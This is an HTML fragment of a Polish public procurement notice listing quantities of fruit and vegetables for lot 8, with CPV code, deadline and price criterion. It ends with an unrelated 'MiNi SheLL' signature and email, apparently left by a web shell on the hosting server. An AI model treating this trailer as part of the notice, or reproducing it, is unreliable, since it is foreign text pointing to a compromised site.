<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE, WARZYWA I PODOBNE PRODUKTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Burak ćwikłowy- 400kg, Banan - 250kg, Borowik krojony - 1kg, Borówka-30kg, Brokuły - 20szt, Cebula - 300kg, Cebula czerwona - 10kg, Czosnek - 15kg, Cytryna - 140kg, Cebulka zielona  pęczki - 200szt, Fasola Jaś - 80kg,Fasola szparagowa-20kg, Jabłko - 800kg, Kalafior-30 szt, Kapusta biała -400kg, Kapusta pekińska - 40szt, Kapusta czerwona - 45kg, Kapusta włoska - 60kg, Kapusta kiszona - 100kg, Koper zielony pęczki - 150szt, Kalarepa - 10szt, Klementynka - 60kg,  Marchew - 700kg,  Orzechy włoskie -1,5kg, Ogórek świeży - 50kg, Ogórek kiszony - 90kg, Pieczarka - 150kg, Pietruszka korzeń - 130kg, Pietruszka natka pęczki - 400szt, Podgrzybek krojony 1kg, Pomidory - 200kg,  Papryka świeża - 20kg, Por - 70kg, Pomarańcze - 120kg, Rzodkiewka pęczki - 40szt, Seler korzeń - 150kg,Śliwka węgierka 200kg,Śliwka jerozolimska 100kg, Sałata zielona - 100szt, Sałata lodowa 40szt, Winogron biały - 10kg, Winogron ciemny - 10kg, Ziemniaki 9000kg, Ziemniaki młode - 500 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com